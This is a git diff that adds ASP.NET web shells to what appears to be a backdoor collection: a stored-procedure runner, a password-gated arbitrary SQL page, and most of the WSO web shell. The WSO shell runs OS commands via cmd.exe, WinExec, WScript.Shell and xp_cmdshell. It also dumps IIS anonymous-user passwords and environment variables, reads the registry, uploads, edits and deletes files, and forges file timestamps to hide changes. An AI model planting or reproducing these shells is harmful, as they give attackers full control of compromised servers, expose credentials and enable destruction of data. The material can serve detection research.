+                    case "bit":
+                        sqlCommand.Parameters.Add(((TableCell)dataGridItem.Controls[0]).Text, SqlDbType.Bit).Value = ((TextBox)dataGridItem.Controls[6].Controls[1]).Text;
+                        break;
+                    case "bigint":
+                        sqlCommand.Parameters.Add(((TableCell)dataGridItem.Controls[0]).Text, SqlDbType.BigInt).Value = ((TextBox)dataGridItem.Controls[6].Controls[1]).Text;
+                        break;
+                    case "char":
+                        sqlCommand.Parameters.Add(((TableCell)dataGridItem.Controls[0]).Text, SqlDbType.Char, int.Parse(((TableCell)dataGridItem.Controls[2]).Text)).Value = ((TextBox)dataGridItem.Controls[6].Controls[1]).Text;
+                        break;
+                    case "datetime":
+                        sqlCommand.Parameters.Add(((TableCell)dataGridItem.Controls[0]).Text, SqlDbType.DateTime).Value = ((TextBox)dataGridItem.Controls[6].Controls[1]).Text;
+                        break;
+                    case "decimal":
+                        sqlCommand.Parameters.Add(((TableCell)dataGridItem.Controls[0]).Text, SqlDbType.Decimal).Value = decimal.Parse(((TextBox)dataGridItem.Controls[6].Controls[1]).Text);
+                        break;
+                    case "float":
+                        sqlCommand.Parameters.Add(((TableCell)dataGridItem.Controls[0]).Text, SqlDbType.Float).Value = float.Parse(((TextBox)dataGridItem.Controls[6].Controls[1]).Text);
+                        break;
+                    case "int":
+                        sqlCommand.Parameters.Add(((TableCell)dataGridItem.Controls[0]).Text, SqlDbType.Int).Value = ((TextBox)dataGridItem.Controls[6].Controls[1]).Text;
+                        break;
+                    case "nchar":
+                        sqlCommand.Parameters.Add(((TableCell)dataGridItem.Controls[0]).Text, SqlDbType.NChar).Value = ((TextBox)dataGridItem.Controls[6].Controls[1]).Text;
+                        break;
+                    case "ntext":
+                        sqlCommand.Parameters.Add(((TableCell)dataGridItem.Controls[0]).Text, SqlDbType.NText, int.Parse(((TableCell)dataGridItem.Controls[2]).Text)).Value = ((TextBox)dataGridItem.Controls[6].Controls[1]).Text;
+                        break;
+                    case "nvarchar":
+                        sqlCommand.Parameters.Add(((TableCell)dataGridItem.Controls[0]).Text, SqlDbType.NVarChar, int.Parse(((TableCell)dataGridItem.Controls[2]).Text)).Value = ((TextBox)dataGridItem.Controls[6].Controls[1]).Text;
+                        break;
+                    case "real":
+                        sqlCommand.Parameters.Add(((TableCell)dataGridItem.Controls[0]).Text, SqlDbType.Real).Value = ((TextBox)dataGridItem.Controls[6].Controls[1]).Text;
+                        break;
+                    case "smallint":
+                        sqlCommand.Parameters.Add(((TableCell)dataGridItem.Controls[0]).Text, SqlDbType.SmallInt).Value = ((TextBox)dataGridItem.Controls[6].Controls[1]).Text;
+                        break;
+                    case "tinyint":
+                        sqlCommand.Parameters.Add(((TableCell)dataGridItem.Controls[0]).Text, SqlDbType.TinyInt).Value = uint.Parse(((TextBox)dataGridItem.Controls[6].Controls[1]).Text);
+                        break;
+                    case "varchar":
+                        sqlCommand.Parameters.Add(((TableCell)dataGridItem.Controls[0]).Text, SqlDbType.VarChar, int.Parse(((TableCell)dataGridItem.Controls[2]).Text)).Value = ((TextBox)dataGridItem.Controls[6].Controls[1]).Text;
+                        break;
+                    default:
+                        continue;
+                }
+            }
+
+            if (((TableCell)dataGridItem.Controls[5]).Text == "2")
+            {
+                sqlCommand.Parameters[((TableCell)dataGridItem.Controls[0]).Text].Direction = ParameterDirection.InputOutput;
+            }
+        }
+    }
+
+    /// <summary>
+    /// 
+    /// </summary>
+    /// <param name="sqlCommand"></param>
+    private void UpdateParameters(SqlCommand sqlCommand)
+    {
+        foreach (DataGridItem dataGridItem in gridParameters.Items)
+        {
+            if (((TableCell)dataGridItem.Controls[5]).Text != "5")
+            {
+                ((TableCell)dataGridItem.Controls[7]).Text = sqlCommand.Parameters[((TableCell)dataGridItem.Controls[0]).Text].Value.ToString();
+            }
+        }
+    }
+</script>
+
+<html xmlns="http://www.w3.org/1999/xhtml" >
+<head runat="server">
+    <title>Stored Procedure Execute</title>
+    <style type="text/css"><!--body,table,p,pre,form input,form select {font-family: "Lucida Console", monospace; font-size: 88%;}--></style>
+</head>
+<body>
+    <form id="form1" runat="server">
+    <table>
+            <tbody>
+            	<tr>
+                    <td>
+                        Key:</td>
+                    <td>
+                        <asp:TextBox id="txtAuthKey" runat="server"></asp:TextBox>
+                    </td>
+                </tr>
+                <tr>
+                    <td>
+                        Database server:</td>
+                    <td>
+                        <asp:TextBox id="txtDatabaseServer" runat="server"></asp:TextBox>
+                    </td>
+                </tr>
+                <tr>
+                    <td>
+                        User id:</td>
+                    <td>
+                        <asp:TextBox id="txtUserId" runat="server"></asp:TextBox>
+                    </td>
+                </tr>
+                <tr>
+                    <td>
+                        Password:</td>
+                    <td>
+                        <asp:TextBox id="txtPassword" runat="server"></asp:TextBox>
+                    </td>
+                </tr>
+                <tr>
+                    <td>
+                        Database:</td>
+                    <td>
+                        <asp:TextBox id="txtDatabase" runat="server"></asp:TextBox>
+                    </td>
+                </tr>
+                <tr>
+                    <td>
+                    </td>
+                    <td>
+                        <asp:Button id="btnLogin" onclick="btnLogin_Click" runat="server" Text="Login"></asp:Button>
+                    </td>
+                </tr>
+                <tr>
+                    <td>
+                        Stored procedures:</td>
+                    <td>
+                        <asp:DropDownList id="cboSps" runat="server"></asp:DropDownList>
+                    </td>
+                </tr>
+                <tr>
+                    <td>
+                    </td>
+                    <td>
+                        <p>
+                            <asp:Button id="btnGetParams" onclick="btnGetParameters_Click" runat="server" Text="Get Parameters"></asp:Button>
+                            <asp:Button id="btnExecute" onclick="btnExecute_Click" runat="server" Text="Execute Query"></asp:Button>
+                        </p>
+                    </td>
+                </tr>
+                <tr>
+                    <td>
+                        Status:</td>
+                    <td>
+                        <asp:Label id="lblStatus" runat="server"></asp:Label></td>
+                </tr>
+            </tbody>
+        </table>
+        <p>
+            <asp:DataGrid id="gridParameters" runat="server" AutoGenerateColumns="False">
+                <Columns>
+                    <asp:BoundColumn DataField="column_name" HeaderText="Name"></asp:BoundColumn>
+                    <asp:BoundColumn DataField="type_name" HeaderText="Type"></asp:BoundColumn>
+                    <asp:BoundColumn DataField="length" HeaderText="Length"></asp:BoundColumn>
+                    <asp:BoundColumn DataField="precision" HeaderText="Precision"></asp:BoundColumn>
+                    <asp:BoundColumn DataField="scale" HeaderText="Scale"></asp:BoundColumn>
+                    <asp:BoundColumn DataField="column_type" HeaderText="Column Type"></asp:BoundColumn>
+                    <asp:TemplateColumn HeaderText="Input Value">
+                        <ItemTemplate>
+                            <asp:TextBox ID="TextBox1" runat="server"></asp:TextBox>
+                        </ItemTemplate>
+                    </asp:TemplateColumn>
+                    <asp:BoundColumn HeaderText="Output Value"></asp:BoundColumn>
+                </Columns>
+            </asp:DataGrid>
+        </p>
+        <p>
+            <asp:DataGrid id="gridResults" runat="server"></asp:DataGrid>
+        </p>
+        <p>
+        </p>
+        <p>
+            <a href="spexec.aspx">Restart</a>
+        </p>
+    </form>
+</body>
+</html>
+
+<!-- Created by Mark Woan (http://www.woanware.co.uk) -->
diff --git a/aspx/asp.net-backdoors/sql.aspx b/aspx/asp.net-backdoors/sql.aspx
new file mode 100644
index 00000000..0a07a0ff
--- /dev/null
+++ b/aspx/asp.net-backdoors/sql.aspx
@@ -0,0 +1,104 @@
+<%@ Page Language="C#" %>
+<%@ Import namespace="System.Data"%>
+<%@ Import namespace="System.Data.SqlClient"%>
+
+<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
+
+<script runat="server" language="c#">
+    private const string AUTHKEY = "woanware";
+    
+    /// <summary>
+    /// 
+    /// </summary>
+    /// <param name="sender"></param>
+    /// <param name="e"></param>
+    protected void btnExecute_Click(object sender, EventArgs e)
+    {
+        SqlConnection sqlConnection = null;
+
+        try
+        {
+            if (txtAuthKey.Text != AUTHKEY)
+            {
+                return;
+            }
+            
+            sqlConnection = new SqlConnection();
+            
+            sqlConnection.ConnectionString = txtConnection.Text;
+            sqlConnection.Open();
+
+            SqlCommand sqlCommand = null;
+            SqlDataReader sqlDataReader = null;
+
+            sqlCommand = new SqlCommand(txtSql.Text, sqlConnection);
+            sqlCommand.CommandType = CommandType.Text;
+
+            sqlDataReader = sqlCommand.ExecuteReader();
+
+            StringBuilder output = new StringBuilder();
+
+            output.Append("<table width=\"100%\" border=\"1\">");
+
+            while (sqlDataReader.Read())
+            {
+                output.Append("<tr>");
+
+                int colCount = sqlDataReader.FieldCount;
+
+                for (int index = 0; index < colCount; index++)
+                {
+                    output.Append("<td>");
+                    output.Append(sqlDataReader[index].ToString());
+                    output.Append("</td>");
+                }
+
+                output.Append("</tr>");
+
+                output.Append(Environment.NewLine);
+            }
+
+            output.Append("</table>");
+
+            Literal1.Text = output.ToString();
+
+        }
+        catch (SqlException sqlEx)
+        {
+            Response.Write(sqlEx.ToString());
+        }
+        catch (Exception ex)
+        {
+            Response.Write(ex.ToString());
+        }
+        finally
+        {
+            if (sqlConnection != null)
+            {
+                sqlConnection.Dispose();
+            }
+        }
+    }
+</script>
+
+<html xmlns="http://www.w3.org/1999/xhtml" >
+<head id="Head1" runat="server">
+    <title>SQL</title>
+<style type="text/css"><!--body,table,p,pre,form input,form select {font-family: "Lucida Console", monospace; font-size: 88%;}--></style>
+</head>
+<body>
+    <form id="formSql" runat="server">
+    <div>
+        <table width="100%">
+            <tr><td width="30">Auth Key:</td><td><asp:TextBox ID="txtAuthKey" runat="server" Height="15px" Width="100%"></asp:TextBox></td></tr>
+            <tr><td>Connection:</td><td><asp:TextBox ID="txtConnection" runat="server" Height="15px" Width="100%"></asp:TextBox></td></tr>
+            <tr><td>SQL:</td><td><asp:TextBox ID="txtSql" runat="server" Height="258px" Width="100%"></asp:TextBox></td></tr>
+            <tr><td>&nbsp;</td><td><asp:Button ID="btnExecute" runat="server" OnClick="btnExecute_Click" Text="Execute" /></td></tr>
+            <tr><td colspan="2"><asp:Literal ID="Literal1" runat="server"></asp:Literal></td></tr>
+        </table>
+    </div>
+    </form>
+</body>
+</html>
+
+<!-- Created by Mark Woan (http://www.woanware.co.uk) -->
diff --git a/aspx/wso.aspx b/aspx/wso.aspx
new file mode 100644
index 00000000..a1117490
--- /dev/null
+++ b/aspx/wso.aspx
@@ -0,0 +1,1689 @@
+<%@ Page ContentType="text/html" validateRequest="false" aspcompat="true"%>
+<%@ Import Namespace="System.IO" %>
+<%@ import namespace="System.Diagnostics" %>
+<%@ import namespace="System.Threading" %>
+<%@ import namespace="System.Text" %>
+<%@ import namespace="System.Security.Cryptography" %>
+<%@ Import Namespace="System.Net.Sockets"%>
+<%@ Assembly Name="System.DirectoryServices, Version=2.0.0.0, Culture=neutral, PublicKeyToken=B03F5F7F11D50A3A" %>
+<%@ import Namespace="System.DirectoryServices" %>
+<%@ import Namespace="Microsoft.Win32" %>
+<script language="VB" runat="server">
+Dim PASSWORD as string = "e8ff7d8d7a49a969a2cb8502eded9d79"   '   rooot
+dim url,TEMP1,TEMP2,TITLE as string
+Function GetMD5(ByVal strToHash As String) As String
+            Dim md5Obj As New System.Security.Cryptography.MD5CryptoServiceProvider()
+            Dim bytesToHash() As Byte = System.Text.Encoding.ASCII.GetBytes(strToHash)
+            bytesToHash = md5Obj.ComputeHash(bytesToHash)
+            Dim strResult As String = ""
+            Dim b As Byte
+            For Each b In bytesToHash
+                strResult += b.ToString("x2")
+            Next
+            Return strResult
+End Function
+Sub Login_click(sender As Object, E As EventArgs)
+	if GetMD5(Textbox.Text)=PASSWORD then     
+		session("rooot")=1
+		session.Timeout=60
+	else
+		response.Write("<font color='red'>Your password is wrong! Maybe you press the ""Caps Lock"" buttom. Try again.</font><br>")
+	end if
+End Sub
+'Run w32 shell
+Declare Function WinExec Lib "kernel32" Alias "WinExec" (ByVal lpCmdLine As String, ByVal nCmdShow As Long) As Long
+Declare Function CopyFile Lib "kernel32" Alias "CopyFileA" (ByVal lpExistingFileName As String, ByVal lpNewFileName As String, ByVal bFailIfExists As Long)  As Long
+
+Sub RunCmdW32(Src As Object, E As EventArgs)
+	dim command
+	dim fileObject = Server.CreateObject("Scripting.FileSystemObject")		
+	dim tempFile = Environment.GetEnvironmentVariable("TEMP") & "\"& fileObject.GetTempName( )
+	If Request.Form("txtCommand1") = "" Then
+		command = "dir c:\"	
+	else 
+		command = Request.Form("txtCommand1")
+	End If	
+	ExecuteCommand1(command,tempFile,txtCmdFile.Text)
+	OutputTempFile1(tempFile,fileObject)
+	'txtCommand1.text=""
+End Sub
+Sub ExecuteCommand1(command As String, tempFile As String,cmdfile As String)
+	Dim winObj, objProcessInfo, item, local_dir, local_copy_of_cmd, Target_copy_of_cmd
+	Dim objStartup, objConfig, objProcess, errReturn, intProcessID, temp_name
+	Dim FailIfExists
+	
+	local_dir = left(request.servervariables("PATH_TRANSLATED"),inStrRev(request.servervariables("PATH_TRANSLATED"),"\"))
+	'local_copy_of_cmd = Local_dir+"cmd.exe"
+	'local_copy_of_cmd= "C:\\WINDOWS\\system32\\cmd.exe"
+	local_copy_of_cmd=cmdfile
+	Target_copy_of_cmd = Environment.GetEnvironmentVariable("Temp")+"\kiss.exe"
+	CopyFile(local_copy_of_cmd, Target_copy_of_cmd,FailIfExists)
+	errReturn = WinExec(Target_copy_of_cmd + " /c " + command + "  > " + tempFile , 10)
+	response.write(errReturn)
+	thread.sleep(500)
+End Sub
+Sub OutputTempFile1(tempFile,oFileSys)
+	On Error Resume Next 
+	dim oFile = oFileSys.OpenTextFile (tempFile, 1, False, 0)
+	resultcmdw32.text=txtCommand1.text & vbcrlf & "<pre>" & (Server.HTMLEncode(oFile.ReadAll)) & "</pre>"
+   	oFile.Close
+   	Call oFileSys.DeleteFile(tempFile, True)	 
+End sub
+'End w32 shell
+'Run WSH shell
+Sub RunCmdWSH(Src As Object, E As EventArgs)
+	dim command
+	dim fileObject = Server.CreateObject("Scripting.FileSystemObject")
+	dim oScriptNet = Server.CreateObject("WSCRIPT.NETWORK")
+	dim tempFile = Environment.GetEnvironmentVariable("TEMP") & "\"& fileObject.GetTempName( )
+	If Request.Form("txtcommand2") = "" Then
+		command = "dir c:\"	
+	else 
+		command = Request.Form("txtcommand2")
+	End If	  
+	ExecuteCommand2(command,tempFile)
+	OutputTempFile2(tempFile,fileObject)
+	txtCommand2.text=""
+End Sub
+Function ExecuteCommand2(cmd_to_execute, tempFile)
+	  Dim oScript
+	  oScript = Server.CreateObject("WSCRIPT.SHELL")
+      Call oScript.Run ("cmd.exe /c " & cmd_to_execute & " > " & tempFile, 0, True)
+End function
+Sub OutputTempFile2(tempFile,fileObject)
+    On Error Resume Next
+	dim oFile = fileObject.OpenTextFile (tempFile, 1, False, 0)
+	resultcmdwsh.text=txtCommand2.text & vbcrlf & "<pre>" & (Server.HTMLEncode(oFile.ReadAll)) & "</pre>"
+	oFile.Close
+	Call fileObject.DeleteFile(tempFile, True)
+End sub
+'End WSH shell
+
+'System infor
+Sub output_all_environment_variables(mode)
+   	Dim environmentVariables As IDictionary = Environment.GetEnvironmentVariables()
+   	Dim de As DictionaryEntry
+	For Each de In  environmentVariables
+	if mode="HTML" then
+	response.write("<b> " +de.Key + " </b>: " + de.Value + "<br>")
+	else
+	if mode="text"
+	response.write(de.Key + ": " + de.Value + vbnewline+ vbnewline)
+	end if		
+	end if
+   	Next
+End sub
+Sub output_all_Server_variables(mode)
+    dim item
+    for each item in request.servervariables
+	if mode="HTML" then
+	response.write("<b>" + item + "</b> : ")
+	response.write(request.servervariables(item))
+	response.write("<br>")
+	else
+		if mode="text"
+			response.write(item + " : " + request.servervariables(item) + vbnewline + vbnewline)
+		end if		
+	end if
+    next
+End sub
+'End sysinfor
+Function Server_variables() As String
+	dim item
+	dim tmp As String
+	tmp=""
+    for each item in request.ServerVariables
+    	if request.servervariables(item) <> ""
+    	'response.write(item + " : " + request.servervariables(item) + vbnewline + vbnewline)
+    	tmp =+ item.ToString + " : " + request.servervariables(item).ToString + "\n\r"
+    	end if
+    next
+    return tmp
+End function
+'Begin List processes
+Function output_wmi_function_data(Wmi_Function,Fields_to_Show)
+		dim objProcessInfo , winObj, item , Process_properties, Process_user, Process_domain
+		dim fields_split, fields_item,i
+
+		'on error resume next
+
+		table("0","","")
+		Create_table_row_with_supplied_colors("black","white","center",Fields_to_Show)
+
+		winObj = GetObject("winmgmts:{impersonationLevel=impersonate}!\\.\root\cimv2")
+		objProcessInfo = winObj.ExecQuery("Select "+Fields_to_Show+" from " + Wmi_Function)					
+		
+		fields_split = split(Fields_to_Show,",")
+		for each item in objProcessInfo	
+			tr
+				Surround_by_TD_and_Bold(item.properties_.item(fields_split(0)).value)
+				if Ubound(Fields_split)>0 then
+					for i = 1 to ubound(fields_split)
+						Surround_by_TD(center_(item.properties_.item(fields_split(i)).value))				
+					next
+				end if
+			_tr
+		next
+End function
+Function output_wmi_function_data_instances(Wmi_Function,Fields_to_Show,MaxCount)
+		dim objProcessInfo , winObj, item , Process_properties, Process_user, Process_domain
+		dim fields_split, fields_item,i,count
+		newline
+		rw("Showing the first " + cstr(MaxCount) + " Entries")
+		newline
+		newline
+		table("1","","")
+		Create_table_row_with_supplied_colors("black","white","center",Fields_to_Show)
+		_table
+		winObj = GetObject("winmgmts:{impersonationLevel=impersonate}!\\.\root\cimv2")
+'		objProcessInfo = winObj.ExecQuery("Select "+Fields_to_Show+" from " + Wmi_Function)					
+		objProcessInfo = winObj.InstancesOf(Wmi_Function)					
+		
+		fields_split = split(Fields_to_Show,",")
+		count = 0
+		for each item in objProcessInfo		
+			count = Count + 1
+			table("1","","")
+			tr
+				Surround_by_TD_and_Bold(item.properties_.item(fields_split(0)).value)
+				if Ubound(Fields_split)>0 then
+					for i = 1 to ubound(fields_split)
+						Surround_by_TD(item.properties_.item(fields_split(i)).value)				
+					next
+				end if
+			_tr
+			if count > MaxCount then exit for
+		next
+End function
+'End List processes
+'Begin IIS_list_Anon_Name_Pass
+Sub IIS_list_Anon_Name_Pass()
+		Dim IIsComputerObj, iFlags ,providerObj ,nodeObj ,item, IP
+		
+		IIsComputerObj = CreateObject("WbemScripting.SWbemLocator") 			' Create an instance of the IIsComputer object
+		providerObj = IIsComputerObj.ConnectServer("127.0.0.1", "root/microsoftIISv2")
+		nodeObj  = providerObj.InstancesOf("IIsWebVirtualDirSetting") '  - IISwebServerSetting
+		
+		Dim MaxCount = 20,Count = 0
+		hr
+		RW("only showing the first "+cstr(MaxCount) + " items")
+		hr
+		for each item in nodeObj
+			response.write("<b>" + item.AppFriendlyName + " </b> -  ")
+			response.write("(" + item.AppPoolId + ") ")
+		
+			response.write(item.AnonymousUserName + " : ")
+			response.write(item.AnonymousUserPass)
+			
+			response.write("<br>")
+			
+			response.flush
+			Count = Count +1
+			If Count > MaxCount then exit for
+		next		
+		hr
+End sub	
+'End IIS_list_Anon_Name_Pass
+Private Function CheckIsNumber(ByVal sSrc As String) As Boolean
+	Dim reg As New System.Text.RegularExpressions.Regex("^0|[0-9]*[1-9][0-9]*$")
+      If reg.IsMatch(sSrc) Then
+            Return True
+      Else
+            Return False
+      End If
+End Function
+
+Public Function IISSpy() As String
+      Dim iisinfo As String = ""
+      Dim iisstart As String = ""
+      Dim iisend As String = ""
+      Dim iisstr As String = "IIS://localhost/W3SVC"
+      Dim i As Integer = 0
+      Try
+            Dim mydir As New DirectoryEntry(iisstr)
+            iisstart = "<TABLE width=100% align=center border=0><TR align=center><TD width=5%><B>Order</B></TD><TD width=20%><B>IIS_USER</B></TD><TD width=20%><B>App_Pool_Id</B></TD><TD width=25%><B>Domain</B></TD><TD width=30%><B>Path</B></TD></TR>"
+            For Each child As DirectoryEntry In mydir.Children
+                  If CheckIsNumber(child.Name.ToString()) Then
+                        Dim dirstr As String = child.Name.ToString()
+                        Dim tmpstr As String = ""
+                        Dim newdir As New DirectoryEntry(iisstr + "/" + dirstr)
+                        Dim newdir1 As DirectoryEntry = newdir.Children.Find("root", "IIsWebVirtualDir")
+						i = i + 1
+                        iisinfo += "<TR><TD align=center>" + i.ToString() + "</TD>"
+                        iisinfo += "<TD align=center>" + newdir1.Properties("AnonymousUserName").Value.ToString() + "</TD>"
+                        iisinfo += "<TD align=center>" + newdir1.Properties("AppPoolId").Value.ToString() + "</TD>"
+                        iisinfo += "<TD>" + child.Properties("ServerBindings")(0) + "</TD>"
+                        iisinfo += "<TD><a href="+Request.ServerVariables("PATH_INFO")+ "?action=goto&src=" + newdir1.Properties("Path").Value.ToString() + "\>" + newdir1.Properties("Path").Value + "\</a></TD>"
+                        iisinfo += "</TR>"
+                  End If
+            Next
+            iisend = "</TABLE>"
+      Catch ex As Exception
+            Return ex.Message
+      End Try
+      Return iisstart + iisinfo + iisend
+End Function
+
+Sub RegistryRead(Src As Object, E As EventArgs)
+	Try
+            Dim regkey As String = txtRegKey.Text
+            Dim subkey As String = regkey.Substring(regkey.IndexOf("\") + 1, regkey.Length - regkey.IndexOf("\") - 1)
+            Dim rk As RegistryKey = Nothing
+            Dim buffer As Object
+            Dim regstr As String = ""
+            If regkey.Substring(0, regkey.IndexOf("\")) = "HKEY_LOCAL_MACHINE" Then
+                  rk = Registry.LocalMachine.OpenSubKey(subkey)
+            End If
+            If regkey.Substring(0, regkey.IndexOf("\")) = "HKEY_CLASSES_ROOT" Then
+                  rk = Registry.ClassesRoot.OpenSubKey(subkey)
+            End If
+            If regkey.Substring(0, regkey.IndexOf("\")) = "HKEY_CURRENT_USER" Then
+                  rk = Registry.CurrentUser.OpenSubKey(subkey)
+            End If
+            If regkey.Substring(0, regkey.IndexOf("\")) = "HKEY_USERS" Then
+                  rk = Registry.Users.OpenSubKey(subkey)
+            End If
+            If regkey.Substring(0, regkey.IndexOf("\")) = "HKEY_CURRENT_CONFIG" Then
+                  rk = Registry.CurrentConfig.OpenSubKey(subkey)
+            End If
+            buffer = rk.GetValue(txtRegValue.Text, "NULL")
+		dim tmpbyte As Byte = 0
+                  lblresultReg.Text = "<br>Result : " + buffer.ToString()
+      Catch ex As Exception
+            Response.write(ex.Message)
+      End Try
+End Sub
+
+' Begin List Web Site Home Directory Properties
+
+
+' End List Web Site Home Directory Properties
+Sub RunCMD(Src As Object, E As EventArgs)
+	Try
+	Dim kProcess As New Process()
+	Dim kProcessStartInfo As New ProcessStartInfo("cmd.exe")
+	kProcessStartInfo.UseShellExecute = False
+	kProcessStartInfo.RedirectStandardOutput = true
+	kProcess.StartInfo = kProcessStartInfo
+	kProcessStartInfo.Arguments="/c " & Cmd.text
+	kProcess.Start()
+	Dim myStreamReader As StreamReader = kProcess.StandardOutput
+	Dim myString As String = myStreamReader.Readtoend()
+	kProcess.Close()
+	result.text=Cmd.text & vbcrlf & "<pre>" & mystring & "</pre>"
+	Cmd.text=""
+	Catch
+	result.text="This function has disabled!"
+	End Try
+End Sub
+Sub CloneTime(Src As Object, E As EventArgs)
+	existdir(time1.Text)
+	existdir(time2.Text)
+	Dim thisfile As FileInfo =New FileInfo(time1.Text)
+	Dim thatfile As FileInfo =New FileInfo(time2.Text)
+	thisfile.LastWriteTime = thatfile.LastWriteTime
+	thisfile.LastAccessTime = thatfile.LastAccessTime
+	thisfile.CreationTime = thatfile.CreationTime
+	response.Write("<font color=""red"">Clone Time Success!</font>")
+End Sub
+sub Editor(Src As Object, E As EventArgs)
+	dim mywrite as new streamwriter(filepath.text,false,encoding.default)
+	mywrite.write(content.text)
+	mywrite.close
+	response.Write("<script>alert('Edit|Creat " & replace(filepath.text,"\","\\") & " Success!');location.href='"& request.ServerVariables("URL") & "?action=goto&src="& server.UrlEncode(Getparentdir(filepath.text)) &"'</sc" & "ript>")
+end sub
+Sub UpLoad(Src As Object, E As EventArgs)
+	dim filename,loadpath as string
+	filename=path.getfilename(UpFile.value)
+	loadpath=request.QueryString("src") & filename
+	if  file.exists(loadpath)=true then 
+		response.Write("<script>alert('File " & replace(loadpath,"\","\\") & " have existed , upload fail!');location.href='"& request.ServerVariables("URL") & "?action=goto&src="& server.UrlEncode(request.QueryString("src")) &"'</sc" & "ript>")
+		response.End()
+	end if
+	UpFile.postedfile.saveas(loadpath)
+	response.Write("<script>alert('File " & filename & " upload success!\nFile info:\n\nClient Path:" & replace(UpFile.value,"\","\\") & "\nFile Size:" & UpFile.postedfile.contentlength & " bytes\nSave Path:" & replace(loadpath,"\","\\") & "\n');")
+	response.Write("location.href='" & request.ServerVariables("URL") & "?action=goto&src=" & server.UrlEncode(request.QueryString("src")) & "'</sc" & "ript>")
+End Sub
+Sub NewFD(Src As Object, E As EventArgs)
+	url=request.form("src")
+	if NewFile.Checked = True then
+		dim mywrite as new streamwriter(url & NewName.Text,false,encoding.default)
+		mywrite.close
+		response.Redirect(request.ServerVariables("URL") & "?action=edit&src=" & server.UrlEncode(url & NewName.Text))
+	else
+		directory.createdirectory(url & NewName.Text)
+		response.Write("<script>alert('Creat directory " & replace(url & NewName.Text ,"\","\\") & " Success!');location.href='"& request.ServerVariables("URL") & "?action=goto&src="& server.UrlEncode(url) &"'</sc" & "ript>")
+	end if
+End Sub
+Sub del(a)
+	if right(a,1)="\" then
+		dim xdir as directoryinfo
+		dim mydir as new DirectoryInfo(a)
+		dim xfile as fileinfo
+		for each xfile in mydir.getfiles()
+			file.delete(a & xfile.name)
+		next
+		for each xdir in mydir.getdirectories()
+			call del(a & xdir.name & "\")
+		next
+		directory.delete(a)
+	else
+		file.delete(a)
+	end if
+End Sub
+Sub copydir(a,b)
+	dim xdir as directoryinfo
+	dim mydir as new DirectoryInfo(a)
+	dim xfile as fileinfo
+	for each xfile in mydir.getfiles()
+		file.copy(a & "\" & xfile.name,b & xfile.name)
+	next
+	for each xdir in mydir.getdirectories()
+		directory.createdirectory(b & path.getfilename(a & xdir.name))
+		call copydir(a & xdir.name & "\",b & xdir.name & "\")
+	next
+End Sub
+Sub xexistdir(temp,ow)
+	if directory.exists(temp)=true or file.exists(temp)=true then 
+		if ow=0  then
+			response.Redirect(request.ServerVariables("URL") & "?action=samename&src=" & server.UrlEncode(url))
+		elseif ow=1 then
+			del(temp)
+		else
+			dim d as string = session("cutboard")
+			if right(d,1)="\" then
+				TEMP1=url & second(now) & path.getfilename(mid(replace(d,"
",""),1,len(replace(d,"
",""))-1))
+			else
+				TEMP2=url & second(now) & replace(path.getfilename(d),"
","")
+			end if
+		end if
+	end if
+End Sub
+Sub existdir(temp)
+		if  file.exists(temp)=false and directory.exists(temp)=false then 
+			response.Write("<script>alert('Don\'t exist " & replace(temp,"\","\\")  &" ! Is it a CD-ROM ?');</sc" & "ript>")
+			response.Write("<br><br><a href='javascript:history.back(1);'>Click Here Back</a>")
+			response.End()
+		end if
+End Sub
+Sub RunSQLCMD(Src As Object, E As EventArgs)
+	Dim adoConn,strQuery,recResult,strResult
+	if SqlName.Text<>"" then
+		adoConn=Server.CreateObject("ADODB.Connection") 
+		adoConn.Open("Provider=SQLOLEDB.1;Password=" & SqlPass.Text & ";UID=" & SqlName.Text & ";Data Source = " & ip.Text) 
+		If Sqlcmd.Text<>"" Then 
+			strQuery = "exec master.dbo.xp_cmdshell '" & Sqlcmd.Text & "'" 
+	  		recResult = adoConn.Execute(strQuery) 
+ 	 		If NOT recResult.EOF Then 
+   				Do While NOT recResult.EOF 
+    				strResult = strResult & chr(13) & recResult(0).value
+    				recResult.MoveNext 
+   				Loop 
+ 	 		End if 
+  			recResult = Nothing 
+  			strResult = Replace(strResult," ","&nbsp;") 
+  			strResult = Replace(strResult,"<","&lt;") 
+  			strResult = Replace(strResult,">","&gt;") 
+			resultSQL.Text=SqlCMD.Text & vbcrlf & "<pre>" & strResult & "</pre>"
+			SqlCMD.Text=""
+		 End if 
+  		adoConn.Close 
+	 End if
+ End Sub
+Sub RunSQLQUERY(Src As Object, E As EventArgs)
+	Dim adoConn,strQuery,recResult,strResult
+	if txtSqlName.Text<>"" then
+		adoConn=Server.CreateObject("ADODB.Connection") 
+		adoConn.Open("Provider=SQLOLEDB.1;Password=" & txtSqlPass.Text & ";UID=" & txtSqlName.Text & ";Data Source = " & txtHost.Text) 
+		If txtSqlcmd.Text<>"" Then 
+			strQuery = txtSqlcmd.Text
+	  		recResult = adoConn.Execute(strQuery) 
+ 	 		If NOT recResult.EOF Then 
+   				Do While NOT recResult.EOF 
+    				strResult = strResult & chr(13) & recResult(0).value
+    				recResult.MoveNext 
+   				Loop 
+ 	 		End if 
+  			recResult = Nothing 
+  			strResult = Replace(strResult," ","&nbsp;") 
+  			strResult = Replace(strResult,"<","&lt;") 
+  			strResult = Replace(strResult,">","&gt;") 
+			lblresultSQL.Text=txtSqlCMD.Text & vbcrlf & "<pre>" & strResult & "</pre>"
+			txtSqlCMD.Text=""
+		 End if 
+  		adoConn.Close 
+	 End if
+ End Sub
+
+Function GetStartedTime(ms) 
+	GetStartedTime=cint(ms/(1000*60*60))
+End function
+Function getIP() 
+    Dim strIPAddr as string
+    If Request.ServerVariables("HTTP_X_FORWARDED_FOR") = "" OR InStr(Request.ServerVariables("HTTP_X_FORWARDED_FOR"), "unknown") > 0 Then
+        strIPAddr = Request.ServerVariables("REMOTE_ADDR")
+    ElseIf InStr(Request.ServerVariables("HTTP_X_FORWARDED_FOR"), ",") > 0 Then
+        strIPAddr = Mid(Request.ServerVariables("HTTP_X_FORWARDED_FOR"), 1, InStr(Request.ServerVariables("HTTP_X_FORWARDED_FOR"), ",")-1)
+    ElseIf InStr(Request.ServerVariables("HTTP_X_FORWARDED_FOR"), ";") > 0 Then
+        strIPAddr = Mid(Request.ServerVariables("HTTP_X_FORWARDED_FOR"), 1, InStr(Request.ServerVariables("HTTP_X_FORWARDED_FOR"), ";")-1)
+    Else
+        strIPAddr = Request.ServerVariables("HTTP_X_FORWARDED_FOR")
+    End If
+    getIP = Trim(Mid(strIPAddr, 1, 30))
+End Function
